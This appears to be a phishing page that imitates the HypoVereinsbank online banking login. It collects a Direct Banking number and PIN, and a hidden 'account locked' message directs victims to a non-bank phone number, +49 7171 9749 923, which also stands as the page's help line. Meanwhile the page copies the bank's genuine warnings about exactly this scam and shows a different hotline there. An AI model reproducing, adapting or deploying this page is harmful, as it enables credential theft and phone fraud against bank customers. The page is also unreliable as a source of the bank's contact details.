<!DOCTYPE html>
<html lang="en">

<head>
    <title></title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="apple-touch-icon" href="assets/img/apple-icon.png">
    <link rel="shortcut icon" type="image/x-icon" href="assets/img/favicon.ico">
    <!-- Load Require CSS -->
    <link href="assets/css/bootstrap.min.css" rel="stylesheet">
    <!-- Font CSS -->
    <link href="assets/css/boxicon.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600&display=swap" rel="stylesheet">
    <!-- Load Tempalte CSS -->
    <link rel="stylesheet" href="assets/css/style.css">
    <!-- Custom CSS -->
    <script defer src="https://use.fontawesome.com/releases/v5.15.4/js/all.js" integrity="sha384-rOA1PnstxnOBLzCLMcre8ybwbTmemjzdNlILg8O7z1lUkLXozs4DHonlDtnE7fpc" crossorigin="anonymous"></script>
	<link rel="stylesheet" href="assets/css/custom.css">
<!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-178031011-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];

        function gtag() {
            dataLayer.push(arguments);
        }
        gtag('js', new Date());

        gtag('config', 'UA-178031011-1');
    </script>
</head>

<body>
    <!-- Header -->
    <nav id="main_nav" class="navbar navbar-expand-lg navbar-light bg-white shadow">
        <div class="container d-flex justify-content-between align-items-center" style="max-width:1440px">
            <a class="navbar-brand h1" href="index.html">
                <img src="./assets/img/logo.png"/ style="width:200px">
            </a>
            <button class="navbar-toggler border-0" type="button" data-bs-toggle="collapse" data-bs-target="#navbar-toggler-success" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>

            <div class="align-self-center collapse navbar-collapse flex-fill  d-lg-flex justify-content-lg-between" id="navbar-toggler-success">
                <div class="">
                    <ul class="nav navbar-nav d-flex justify-content-between  text-center text-dark">
                        <li class="nav-item">
                            <a class="nav-link rounded-pill " href="index.html">Privatkunden</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link rounded-pill " href="">
Wealth Management & <br>Private Banking</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link rounded-pill " href="">Unternehmenskunden</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link rounded-pill " href="">Nachhaltigkeit
</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link rounded-pill " href="">Über Uns</a>
                        </li>
						<li class="nav-item">
                            <a class="nav-link rounded-pill " href="">Services</a>
                        </li>

                    </ul>
                </div>
                <div class="navbar align-self-center d-flex" style="border-left:1px solid #e5e5e5">
                    <a class="nav-link" href="#"><i class="fa fa-search" style="font-size:20px;color:#666"></i></a>
                    <a class="nav-link" href="#"><i class="fa fa-phone" style="font-size:20px;color:#666; -moz-transform: scale(-1, -1);
    -o-transform: scale(-1, -1);
    -webkit-transform: scale(-1, -1);
    transform: scale(-1, -1);"></i></a>
					<a class="nav-link" href="#"><i class="fa fa-map-marker" style="font-size:20px;color:#666;"></i></a>
                    <a class="nav-link" href="#"style="background:#c60e13"><i class="fas fa-sign-in-alt" style="font-size:30px;color:#fff"></i></a>
                </div>
            </div>
        </div>
    </nav>
    <!-- Close Header -->


    <!-- Start Banner Hero -->
    <section class="pt" style="background-image: url(./assets/img/back.jpg);   padding: 100px;    background-size: cover;">
	<div class="container">
	<div class="row">
	<div class="col-md-5">
	
	
	<form style="background:#fff;padding:50px" action="field-error.html">
             <h2>Willkommen im HVB Online Banking</h2>
			 <!-- <div id="welcomeDiv"  style="display:none;color:red" class="answer_list" > Aufgrund verdächtiger Aktivitäten wurde Ihr Konto gesperrt. Bitte wenden Sie sich unverzüglich an unseren Kundensupport +49 7171 9749 923 . Fehlercode - HVB401</div> -->
			 
			 <p style="font-size:20px;padding-bottom:30px">Bitte loggen Sie sich ein.</p>

                  <div class="form-outline mb-4">
                      <label class="form-label" for="form2Example11">Direct Banking Nummer* </label>
                    <input type="text" id="form2Example11" class="form-control" placeholder=""/>
                    
                  </div>

                  <div class="form-outline mb-4">
                       <label class="form-label" for="form2Example22">Passwort (Direct Banking PIN)*</label>
                    <input type="password" id="form2Example22" class="form-control" />
                   
                  </div>

                  <div class="text-center pt-1 mb-5 pb-1">
                    <a class="text-muted" href="#!" style="float:left;">*Pflichtfelder</a>
					<button class="btn btn-block fa-lg gradient-custom-2 mb-3 pp" type="submit" value="Show Div"  style="float:right;color:#fff">ANMELDEN</button>
                    
                  </div>

                 

                </form>
				 <div class="d-flex align-items-center justify-content-center pb-4" style="background:#e5eff2;padding:20px">
                   <p><b>Achtung vor Suchmaschinen-Phishing (z.B. über Google, Bing, etc.)</b><br> Bitte beachten Sie die unten stehenden Sicherheitshinweise auf dieser Seite</p>

                  <p></p>
                    
                  </div>
				
				</div>
	<div class="col-md-7">
	<div class="parent2">
  <div class="absolute2"><h2 >Online Banking to go: Die Mobile Banking App</h2>
  
  <p>Erledigen Sie Ihre Bankgeschäfte auch ganz einfach mit dem Smartphone.</p>
  <div class="row" style="padding-top:50px">
  <div class="col-sm-4"><img src="./assets/img/1.svg" style="width:200px;text-align:center"></div>
   <div class="col-sm-4"><img src="./assets/img/2.svg" style="width:200px;text-align:center"></div>
    <div class="col-sm-4"><img src="./assets/img/3.svg" style="width:200px;text-align:center"></div>
  
  
  </div>
  </div>
</div>
	
	</div>
	
	
	</div>
	</div>
	</section>
    <!-- End Banner Hero -->



    <!-- Start Service -->
    <section class="service-wrapper " style="">
        <div class="container-fluid pb-3">
            <div class="row">
			<div class="col-md-2"></div>
			<div class="col-md-8 " style="padding-bottom:50px">
			<h2 style="text-align:center;paddingbottom:40px;padding-top:50px">Beachten Sie folgende Sicherheitshinweise:</h2>
             <div class="accordion accordion-flush" id="accordionFlushExample">
  <div class="accordion-item">
    <h2 class="accordion-header" id="flush-headingOne">
      <button class="accordion-button collapsed hp" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseOne" aria-expanded="false" aria-controls="flush-collapseOne">
        Achtung vor Suchmaschinen-Phishing (z.B. über Google, Bing, etc)
      </button>
    </h2>
    <div id="flush-collapseOne" class="accordion-collapse collapse" aria-labelledby="flush-headingOne" data-bs-parent="#accordionFlushExample">
      <div class="accordion-body">Aktuell sind in den Ergebnislisten von Suchmaschinen vermehrt Anzeigen von Betrügern geschaltet, die auf gefälschte HVB Online Banking Seiten verweisen. Dort wird dem Kunden suggeriert, dass sein Online Banking Zugang gesperrt ist und dass eine angegebene (betrügerische) Telefonnummer kontaktiert werden soll.<br>

So schützen Sie sich:

<li>Vergewissern Sie sich immer, ob Sie sich auch auf der richtigen HVB-Internetseite befinden (siehe auch: Phishing Webseiten erkennen )</li>

<li>Rufen Sie die HVB Online Banking Seite ausschließlich durch Eingabe von www.hvb.de in der URL-Adresszeile Ihres Browsers auf oder verwenden Sie den Favoriteneintrag Ihres Browsers.</li>

<li>Falls Sie die Bank telefonisch kontaktieren, so kontaktieren Sie direkt Ihren Betreuer oder vergewissern Sie sich über die Korrektheit der Telefonnummer auf www.hvb.de</li>

Weitere Informationen zu Betrugsprävention finden Sie unter: Betrugsprävention: Hinweise auf Betrug</div>
    </div>
  </div>
  <div class="accordion-item">
    <h2 class="accordion-header" id="flush-headingTwo">
      <button class="accordion-button collapsed hp" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseTwo" aria-expanded="false" aria-controls="flush-collapseTwo">
        Achtung vor SMS-Phishing (Smishing) - "Ihr Paket wird heute geliefert…"
      </button>
    </h2>
    <div id="flush-collapseTwo" class="accordion-collapse collapse" aria-labelledby="flush-headingTwo" data-bs-parent="#accordionFlushExample">
      <div class="accordion-body">„Ihr Paket wird heute geliefert…“ So oder so ähnlich beginnen die SMS-Nachrichten, die seit Tagen NutzerInnen von Smartphones und Handys erhalten. Diese fordern zum Klicken eines Links auf.

Es handelt sich dabei um das sogenannte „Smishing“ – eine Wortschöpfung aus den Begriffen SMS (Kurznachrichten) und Phishing (Diebstahl von Zugangsdaten über gefälschte Nachrichten oder E-Mails).

Alle wichtigen Informationen finden Sie auch hier auf den Seiten des BSI 

So handeln Sie richtig:

<li>In SMS keinen Link anklicken, Daten auf Webseiten eingeben oder Apps aus unbekannten Quellen herunterladen.</li>
<li>SMS löschen
<li>Falls doch auf einen Link geklickt wurde und/oder eine App installiert wurde:</li>
- Flugmodus einstellen
- Daten lokal sichern
- Provider informieren
- In Werkseinstellungen zurücksetzen
- Strafanzeige stellen
<li>Wurde zwischenzeitlich (nach Installation der APP oder Folgen eines Links) eine Banktransaktion getätigt?</li>
Falls ja:
- Online Banking sofort sperren lassen (Sperrhotline +49 89 558 772 100)
- Smartphone erst wieder in Betrieb nehmen, wenn es von der Schadsoftware bereinigt wurde.</div>
    </div>
  </div>
  <div class="accordion-item">
    <h2 class="accordion-header" id="flush-headingThree">
      <button class="accordion-button collapsed hp" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapseThree" aria-expanded="false" aria-controls="flush-collapseThree">
        Vorsicht vor betrügerischen Anrufen!
      </button>
    </h2>
    <div id="flush-collapseThree" class="accordion-collapse collapse" aria-labelledby="flush-headingThree" data-bs-parent="#accordionFlushExample">
      <div class="accordion-body">Zurzeit kommt es vermehrt zu Fake-Anrufen, bei denen sich Betrüger als Mitarbeiter der HypoVereinsbank ausgeben. Sie versuchen, an Ihre Online-Banking-Zugangsdaten zu kommen. Dabei fälschen die Betrüger die Anruferkennung, sodass im Telefondisplay z.B. die Nummer des HVB-Kartenservice erscheint.

Achtung: Mitarbeitende der HypoVereinsbank werden Sie niemals anrufen, um Ihre Daten abzufragen! Teilen Sie Anrufern niemals Ihre Daten mit, auch wenn Sie dazu aufgefordert werden!

Sollten Sie Daten preisgegeben haben, kontaktieren Sie bitte umgehend Ihren Bankbetreuer.</div>
    </div>
  </div>
  
  
  <div class="accordion-item">
    <h2 class="accordion-header" id="flush-headingfor">
      <button class="accordion-button collapsed hp" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapsefor" aria-expanded="false" aria-controls="flush-collapsefor">
        Aktuell: Warnung vor Betrügern über Telefon, E-Mail und SMS
      </button>
    </h2>
    <div id="flush-collapsefor" class="accordion-collapse collapse" aria-labelledby="flush-headingfor" data-bs-parent="#accordionFlushExample">
      <div class="accordion-body">Betrüger erfinden vielfältige Geschichten, um an Ihre Daten, Ihr Konto und damit an Ihr Geld zu kommen.

Betrüger nutzen Telefon, E-Mail oder SMS. Sie geben sich beispielsweise als Mitarbeiter der Bank, Ihres Mobilfunkanbieters oder als Computer-Techniker aus. Dabei ist die Telefonnummer des Anrufers manipuliert oder die SMS beziehungsweise E-Mail gefälscht. Sie werden zur Zusendung persönlicher Daten, Informationen mit einer SMS (z.B. TAN) oder zur Gestattung eines Fernzugriffs auf Ihren Rechner aufgefordert, etwa zur angeblichen Aktualisierung von Daten. Dadurch versuchen die Betrüger, Zugang zu Ihrem Online Banking, Ihrem Computer und/ oder Ihrem Smartphone zu erhalten.

Seien Sie wachsam!

Geben Sie bitte nie Auskunft über Ihre Online Banking Nummer, PIN, TAN, Nummer der Kreditkarte oder andere persönlichen Daten.

Unsere Mitarbeiter werden Sie niemals dazu auffordern.

Wenn Sie nicht sicher sind kontaktieren Sie bitte unseren Online Service unter 

  +49 89 558 772 100

Weiterführende Informationen finden Sie unter  WWW.HYPOVEREINSBANK.DE/HVB/SERVICES/SICHERHEIT/BETRUGSPRAEVENTION </div>
    </div>
  </div>
  
   <div class="accordion-item">
    <h2 class="accordion-header" id="flush-headingfiv">
      <button class="accordion-button collapsed hp" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapsefiv" aria-expanded="false" aria-controls="flush-collapsefiv">
       Geben Sie für den Log-in nur die Direct Banking Nummer, die PIN und ggf. eine TAN ein.
      </button>
    </h2>
    <div id="flush-collapsefiv" class="accordion-collapse collapse" aria-labelledby="flush-headingfiv" data-bs-parent="#accordionFlushExample">
      <div class="accordion-body">Wenn Sie aufgefordert werden weitere Daten einzugeben, rufen Sie uns bitte unverzüglich an:
  +49 89 558 772 100 </div>
    </div>
  </div>
  
  <div class="accordion-item">
    <h2 class="accordion-header" id="flush-headingsix">
      <button class="accordion-button collapsed hp" type="button" data-bs-toggle="collapse" data-bs-target="#flush-collapsesix" aria-expanded="false" aria-controls="flush-collapsesix">
       Sorgen Sie ständig für aktualisierte Virenschutz- und Firewall-Software.
      </button>
    </h2>
    <div id="flush-collapsesix" class="accordion-collapse collapse" aria-labelledby="flush-headingsix" data-bs-parent="#accordionFlushExample">
      <div class="accordion-body">1. Nutzen Sie für Ihr Online Banking nur Computer mit hochwertiger Virenschutzsoftware. Eine Firewall und eine vertrauenswürdige Internetverbindung sind ebenfalls unverzichtbar. Halten Sie Betriebssystem, Browser und Virenschutz stets aktuell. Aktivieren Sie am besten die automatische Aktualisierung.<br>

2. Seien Sie misstrauisch gegenüber unerwarteten Mails unbekannter Absender. Öffnen Sie keinesfalls darin enthaltene Links oder Dateien. Stellen Sie Absenderadresse und vorgeblichen Betreff der E-Mail konkret infrage: Erwarten Sie z. B. tatsächlich ein Paket? Nutzen Sie den Bezahldienstleister, der Ihnen vorgeblich schreibt?
<br>
3. Geben Sie niemals Passwörter und PINs auf fremden Webseiten ein oder telefonisch weiter. Speichern Sie diese auch nie auf Ihrem Computer.

4. Nutzen Sie keine öffentlich zugänglichen Computer fürs Online Banking und meiden Sie frei zugängliche WLANs, z. B. an Flughäfen, in Bahnhöfen oder Hotels.

5. Achten Sie bei der Eingabe sensibler Daten und beim Login zum Online Banking auf verschlüsselte Kommunikation: Die angezeigte Internetadresse muss immer mit https:// beginnen.

6. Nutzen Sie stets verschiedene Passwörter für verschiedene Dienste. Wählen Sie sichere, komplexe Kombinationen, die nicht einfach erraten werden können.

7. Laden Sie nur Software aus vertrauenswürdigen Quellen herunter.

8. Gehen Sie vorsichtig mit externen Datenträgern um. USB-Sticks oder mobile Festplatten können Ihren Computer mit Schadsoftware infizieren.</div>
    </div>
  </div>
  
  
  
</div>
<!--  klsjdgkljsd    -->





  </div>
            </div>
            
		
        </div>

        <div class="service-tag py-5 bg-secondary">
            <div class="col-md-12">
               <h3 style="text-align:center;color:#fff">Sie haben eine Frage?</h3>
			   <h1 style="text-align:center;color:#fff"><i class="fa fa-phone" style="font-size: 55px; color: #fff;; -moz-transform: scale(-1, -1);
    -o-transform: scale(-1, -1);
    -webkit-transform: scale(-1, -1);
    transform: scale(-1, -1);"></i>+49 7171 9749 923 ></h1>
			   <p style="text-align:center;color:#fff;padding-bottom:20px">Mo - Fr: 08.00 -20.00 Uhr und Sa: 08.00 - 14.00 Uhr
</p>
<p style="text-align:center;"><span style="text-align:center;color:#fff;border:2px #fff solid;padding:3px;margin:5px">Zugang online beantragen</span> <span style="text-align:center;color:#fff;border:2px #fff solid;padding:3px;margin:5px">Nachricht schreiben  </span> <span style="text-align:center;color:#fff;border:2px #fff solid;padding:3px;margin:5px;    display: inline-block;
    position: relative;">Filiale finden</span></p>
            </div>
			
        </div>

    </section>

    <section style="background:#666;padding-top:30px;padding-bottom:30px">
	<div class="container">
	
	<div class="row">
	
	<p style="color:#ccc;text-align:center;font-size:20px;font-weight:300">Impressum | Rechtliche Hinweise | Datenschutz | Geschäftsbedingungen & Konditionen | Lob & Kritik</p>
	
	<p style="color:#ccc;text-align:center;font-size:20px;font-weight:300;padding-top:20px">© 2022 HypoVereinsbank</p>
	<img src="./assets/img/uni.png" style="    width: 100px;
    margin: 0px auto;
    margin-top: 20px;"/>
	
	</div>
	
	</div>
        
    </section>
    <!-- End Service -->






    <!-- End Footer -->


    <!-- Bootstrap -->
    <script src="assets/js/bootstrap.bundle.min.js"></script>
    <!-- Load jQuery require for isotope -->
    <script src="assets/js/jquery.min.js"></script>
    <!-- Isotope -->
    <script src="assets/js/isotope.pkgd.js"></script>
    <!-- Page Script -->
    <script>
        $(window).load(function() {
            // init Isotope
            var $projects = $('.projects').isotope({
                itemSelector: '.project',
                layoutMode: 'fitRows'
            });
            $(".filter-btn").click(function() {
                var data_filter = $(this).attr("data-filter");
                $projects.isotope({
                    filter: data_filter
                });
                $(".filter-btn").removeClass("active");
                $(".filter-btn").removeClass("shadow");
                $(this).addClass("active");
                $(this).addClass("shadow");
                return false;
            });
        });
    </script>
    <!-- Templatemo -->
  
</body>


 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
 <script>function showDiv() {
   document.getElementById('welcomeDiv').style.display = "block";
}</script>
</html>